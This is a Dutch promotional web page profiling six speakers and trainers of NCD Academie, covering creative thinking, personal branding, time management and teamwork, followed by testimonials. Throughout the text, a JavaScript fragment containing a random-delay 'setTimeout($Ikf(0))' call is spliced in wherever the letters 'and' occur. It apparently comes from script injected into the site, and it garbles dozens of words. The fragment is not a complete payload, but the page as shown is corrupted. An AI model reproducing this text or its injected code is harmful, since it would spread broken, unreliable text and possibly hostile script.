Geert NCDA

Geert Teunissen

Met recht een spreker met Power!

Bevlogen, inspirerend, deskundig, verbazingwekkend scherp, uiterst adrem, humoristisch, praktisch en  weergaloos snel. Ruim 45 minuten (of een dagdeel) genieten van een bruisende performance vol heerlijke verrassingen en creatieve inspiratie of in de rol van gastspreker, dagvoorzitter, inspiratiebron of presentator.

Onder de naam NCD Academie (voorheen Natuurlijk Creatief Denken) begeleidt hij creatieve processen van organisaties (overheden) en geeft hij trainingen en workshops in het andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders creatief denken en doen, het slimmer werken. Zijn trainingen, begeleidingstrajecten en coaching richten zich vaak op:

 • Creativiteit en mindmappen als beslissende factor
 • Mogelijkheden en de “eigen” kracht van mensen en organisaties
 • “Het onderscheidend vermogen” en het verleggen van grenzen
 • De vierde P (naast Persoonlijk, praktisch en professioneel) van POWER
 • Brain Chain (creatief leiderschap)
 • Samenwerken – leiderschap – (klant)tevredenheid

 

Geert  verleende zijn medewerking aan tal van radio- en televisieprogramma’s. Zo was hij tien jaar lang wekelijks te horen in het regionaal Optimaal FM-radioprogramma de ‘Achterhoekse Business Show’ en maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijks in het Radio Theaterprogramma de ‘Achterhoekse Hart Show’. Deze twee uur durende live-uitzending  werd gemaakt met enerverende, landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijk bekende gasten uit de politiek, sport, business, entertainment, cabaret en muziek.  Hierbij openden de gasten op een ongedwongen wijze hun hart en hun ‘echte ik’ werd blootgelegd.

Tijdens zijn lezingen en workshops staat Geert op een geheel eigen wijze stil bij de kansen, de mogelijkheden en de eigen kracht van mensen en organisaties, communicatie, creatief denken, het verleggen van grenzen, netwerken, talent en ‘het onderscheidende vermogen’. Een verfrissende en interactieve performance. Laat je verrassen door zijn verhaal en het rendement dat je morgen op je werk al hebt!
Opmerkelijk is dat Geert al zijn opleidingen in deeltijdstudie heeft voltooid en daarover prachtige verhalen kan vertellen. Hij vertelt hoe je vooral slimmer moet werken om je doelen, ook in extreme omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden, te realiseren. Werk, studie en voldoende beweging (sport) gaan wel degelijk samen. Geert zorgt voor een beleving waarbij uw congres of evenement ‘een unieke voorstelling’ wordt.

Expertise

 • Creativiteit als beslissende factor
 • Mogelijkheden en de ‘eigen kracht’ van mensen en organisaties
 • ‘Het onderscheidend vermogen’
 • Mindmapping; gebruik je hersens en realiseer tijdwinst
 • De vierde P (naast Persoonlijk, praktisch en professioneel) van POWER
 • Brain Chain (creatief leiderschap)
 • Social media
 • Netwerken
 • Verleggen van grenzen
 • Samenwerking
 • Leiderschap
 • Klanttevredenheid

 

Bijblijven? Volg Geert via LinkedIn, Facebook of Twitter @geertteunissen

 

Jocelyn 1

Jocelyn Rebbens

Een ReBBelse spreker?!
Naar alle waarschijnlijkheid. Want Jocelyn Rebbens is geen doorsnee spreker of trainster. Zij heeft naast hart voor de mens ook oog voor resultaat! Haar passie is het verbinden van persoonlijke ambitie aan merken & organisaties. Vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaar ook haar studiekeuze. Jocelyn (1972) is afgestudeerd als Economisch Psycholoog aan de Universiteit van Tilburg. Na haar afstuderen heeft ze als consultant veel ervaring opgedaan; in de marketingcommunicatie en het marktonderzoek en op het gebied van management development programma’s en incompany business schools. Nationaal en internationaal, profit en non-profit. Zij deelt veel uit ‘eigen werk’ en vertelt open over haar successen en valkuilen…

Jocelyn is eigenaar en oprichtster van ReBBels, Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding Ambition! In haar programma’s legt zij de link tussen deelnemer en organisatie. Omdat professionals anno nu met hun talent, persoonlijkheid en passie veel meer het verschil moeten maken en organisaties slimmer met hun talent om mogen gaan. Goede cv’s of expertise alleen zijn onvoldoende. Zij geeft lezingen, trainingen, workshops, is spreker op congressen en verzorgt adviestrajecten. Ook in het Engels. Haar werkwijze is no-nonsense, persoonlijk, interactief, actueel en energiek. Humor schuwt zij niet. Jocelyn werkt voor mooie merken en serieuze opdrachtgevers. Zij beschikt over goede trainersvaardigheden en licenties, waaronder LIFO® en RET. Daarnaast schrijft zij graag columns en blogs over Personal Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding voor diverse vakbladen en websites waaronder Management Support, Massage Magazine, Estetica en JOBnet. In juli 2012 verscheen Het POWERboek van Kluwer, waaraan zij een bijdrage leverde over Personal Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding.
Wanneer is een lezing, workshop of trainingsprogramma voor ReBBels geslaagd? Als een deelnemer zelf gemotiveerd is één of twee verbeterpunten op te pakken om direct toe te passen in het dagelijks werk. Zodat het effect heeft, er energie en groei ontstaat.

Expertise

 • Personal Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding
 • Zichtbaarheid in Social Media
 • Teambrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding & reputatiemanagement
 • Employer Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding
 • Effectieve Communicatie
 • Praktische Psychologie op het werk
 • Persoonlijk Leiderschap (merk IK)
 • Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding meets Sales
 • Ondernemerschap

 

Bijblijven? Volg Jocelyn via LinkedIn of Twitter @jocelynrebbens

 

Ben Weenink NCDA

Ben Weenink

Netwerker, ondernemer, trainer, projectleider.
Gaat voor inhoud, diepgang en resultaat. Grenzen zijn om te verkennen en op te rekken, buiten je grenzen liggen de kansen, vernieuwingen, daar onderscheid je je!
Ben is een pionier, denkt in kansen, heeft diverse bedrijven opgezet of begeleid: Het opleiden van jonge drop-outs en kansrijke studenten via korte beroepsgerichte opleidingen in de dienst
verlening, het opleiden met baan voor langdurig werkzoekenden in technische banen (met alle nog steeds actuele problematieken van de WMO), het opzetten van het eerste Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse particuliere re-integratie bedrijf (later bekend onder de naam Salto van Interpolis), het samen met DOC opleiden van docenten in de informatica, het positioneren van “het centrum voor de ontwikkeling van het creatief denken” (COCD) in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en België, het opzetten van “het Platform lijmtechniek” met als doel lijmen als verbindingstechniek te promoten en werknemers uit de Maakindustrie te certificeren.
Samen met Geert heeft Ben aan de wieg gestaan van “Natuurlijk Creatief Denken”, hij begeleidt creatieve processen van organisaties en geeftj trainingen en workshops in het “Anders creatief denken en doen”; niet harder- maar andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders slimmer werken!

Expertise

 • Creativiteit als beslissende factor
 • Mindmapping; gebruik je hersens en realiseer tijdwinst
 • Brain Chain (creatief leiderschap)

 

Bijblijven? Volg Ben via LinkedIn

 

Eunice NCDA 2Eunice van Luit

Trainer, coach en trainingsacteur

Het is haar passie om mensen te begeleiden in hun ontwikkeling; mensen inzicht te geven in zichzelf en in het effect dat men bij de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander teweegbrengt. Hierdoor bent u beter instaat om uw handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen en wijze van communiceren aan te passen en op een effectieve manier uw doel(en) te bereiken.

Haar stijl is open, eerlijk en nieuwsgierig, heeft lef en durft dingen aan de kaak te stellen. Eunice is eigenaar en oprichtster van Insig. Ze geeft trainingen en coaching op het gebied van: communicatie, assertiviteit, beïnvloeden, onderhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen, timemanagement, presenteren en persoonlijke effectiviteit.

 

“Niet de organisatie zelf is succesvol, maar de mensen binnen het bedrijf maken de organisatie succesvol. Want het gaat erom meer te vertrouwen op uw eigen talent, passie en kwaliteiten.”

Bijblijven? Volg Eunice via LinkedIn

 

Peter NCDA

Peter Vos

De kunst van het kiezen!

Timemanagement is een van Peter’s passies. Hij weet snel door te dringen tot de kern van de materie: timemanagement is, in essentie, zelfmanagement. Hij schreef er diverse boeken over en publiceert ook over gerelateerde onderwerpen. Kleine en grote groepen inspireert hij door zijn pragmatische en persoonlijke stijl: interactief, confronterend, scherp, humoristisch en gericht op direct toepasbare verbeteringen.
Peter gebruikt, zonder schroom, regelmatig persoonlijke leermomenten. Zijn voorbeelden zijn zeer herkenbaar en zijn eigen diepte- en hoogtepunten zetten zijn deelnemers aan tot reflexie en verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderacties.

 • Heeft u het gevoel dat de uitdagingen op het werk u boven het hoofd groeien?
 • Hebt u chronisch teveel op het bordje?
 • Haalt u uw planning nooit?
 • Vindt u kiezen lastig?
 • Worden uw prioriteiten regelmatig doorkruist?
 • Zijn mailtjes een plaag en hebt u nooit een lege in-box aan het einde van dag?
 • Loopt u te vaak achter de feiten aan?

Dan is het de hoogste tijd om met Peter Vos in zee te gaan. Ook als uw organisatie en/of uw team de uitdagingen boven te groot vinden.
Peter Vos heeft lange tijd voor grote(re) (inter-)nationale organisaties gewerkt tot hij, ruim 10 jaar geleden, samen met Jakob Zwinderman Sherpas Proyects oprichtte. Door de jaren heen werkte hij voor honderden organisaties in binnen- en buitenlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. In het Engels en Duits kan hij zijn bijdragen goed verzorgen.
Als reacties van klanten krijgt hij te horen dat hij inspirerend, pragmatisch, actiegericht en humoristisch is: ‘Peter weet de essentie snel naar boven te krijgen en doorziet mensen; hij heeft een uiterst herkenbare en aangename aanpak’.

Expertise

 • Bij congressen: dagvoorzitter en/of (Keynote)speaker
 • Workshopleider,
 • Trainer,
 • Procesbegeleider

Naast timemanagement ook de volgende thema’s:

 • Communiceren en beïnvloeden
 • Verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andermanagement
 • Persoonlijke POWER

 

Bijblijven? Volg Peter via Linkedin of Twitter @PeterVosSherpas

 

Jakob NCDA

Jakob Zwinderman

TOP team of sukkelbende?
Teams zijn Jakob’s passie. Hij weet een team snel naar een hoger plan te brengen. Hij schreef het boek ‘No Prima Donna’s’ over het koppelen van succesvolle teams uit de topsport en het bedrijfsleven. In kleine en grote groepen spreekt hij niet alleen over het verbeteren van teams maar gaat ook de interactie aan. Met de zaal gaat hij live de confrontatie aan om ter plekke een verbeteringsslag voor te stellen.
In 6 stappen brengt hij u en uw team direct op een inspirerend plan. Zijn ervaring komt niet alleen uit het bedrijfsleven, ook de merites van de overheid en het verenigingsleven kent hij. Hij is voorzitter van een basketbalclub, regiovoorzitter van een politieke partij en voorzitter van een protestantse gemeente (en allemaal tegelijk). Deze brede ervaring leert hem dat met iedereen een verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderslag en een verbeterslag is te maken. Op weg naar verantwoordelijke, energieke en trotse teamleden. Geen smoesjes, aan de slag met gedragen afspraken.
Heeft u het gevoel dat uw team, uw project bemenst is met druiloren, die niet de verantwoordelijkheid nemen, niet uw tempo kunnen volgen en niet in staat zijn uw resultaten te halen? Vraag Jakob Zwinderman eens als spreker. Ook als uw team net die slag naar een topteam moet maken en een inspirerende aanzet nodig heeft.
Jakob Zwinderman heeft lange tijd voor grote organisaties gewerkt tot hij zijn eigen bedrijf Sherpas Proyects oprichtte en samen met maat Peter Vos, timemanagementspecialist, de wereld van trainingen en projectbegeleiding voorziet. Als klanten heeft hij de top 10 bedrijven van Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en van daaruit traint hij ook in het buitenlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Zijn presentaties zijn ook in het Engels beschikbaar.
Als reacties van klanten krijgt hij te horen dat hij inspirerend, realistisch, actiegericht, een verhalenverteller, een vechter is, ‘hier heb je nog een iets aan’ en ‘dit kan ik morgen toepassen’.

Expertise

 • Opener bij congressen, mogelijk in combinatie met een uur durende beeldende presentatie,
 • Voorzitter van een congres, procesbegeleider,
 • Workshopbegeleider, actiegericht met kleinere teams,
  • In combinatie met (fysiek) basketbal,
  • In combinatie met projectmanagement, leiderschap, beïnvloeden.

 

Bijblijven? Volg Jakob via LinkedIn of Twitter @JakobZwinderman

laatste nieuws

Paspoort naar succes 15 juli 2021 in Arnhem 11 juli 2019

Waar een wil is maken we een weg! Ben jij klaar om eens op […]

lees meer
Van werkstress naar werkplezier 15 januari 2018

Woensdag 16 juni 2021 in Arnhem. De inspirerende training “Van werkstress naar werkplezier”. Wie […]

lees meer

reacties van deelnemers

Genoten van de reis die ik met jou heb mogen maken. Genoten van jouw drive en bovenal de unieke boodschap die je brengt.
Voor elke reis heb je een paspoort nodig. Bij die met jou is dat niet anders. Het was een reis die langs verschillende aandachtspunten gaat. Met name om te leren dat we meer in onze mars hebben dan we in eerste instantie denken. Het is een reis waarbij de Nederlandse nuchterheid, bescheidenheid achterwege gelaten mag worden.
We mogen, moeten volledig uit onze schulp komen! 't Wordt zo een reis die de zelfkennis vergroot. Dat is op zijn beurt de kennis die van belang is om je optimaal te kunnen presenteren bij een broodheer. Met je fysieke paspoort in de handen gevuld met persoonlijke kwaliteiten kan de reid dan ook maar een eindpunt hebben, "SUCCES". The place to-be.

Jos Brunink | Realization of Improvements

Geert is als een frisse wind, hij laat je op een ondersteboven-, achterstevoren-manier kijken naar alledaagse zaken. Kijken op een manier die je al sinds je kindertijd afgeleerd hebt, heerlijk! Hij is als trainer één brok energie en inspireert als geen ander. Ik kan iedereen aanraden bij hem een workshop te volgen.

Liesbeth ter Braak | ANT Neuro BV

Power, energie, anders denken, bevlogen. Met recht iemand die kan inspireren om het anders te doen. Niet voor niets begint zijn presentatie met: als je doet wat je altijd deed, krijg je wat je altijd kreeg. Ik kreeg energie en vooral de behoefte om het anders te doen, niet morgen, maar nu!

Janneke Knuiman | Facilitair manager
aanmelden nieuwsbrief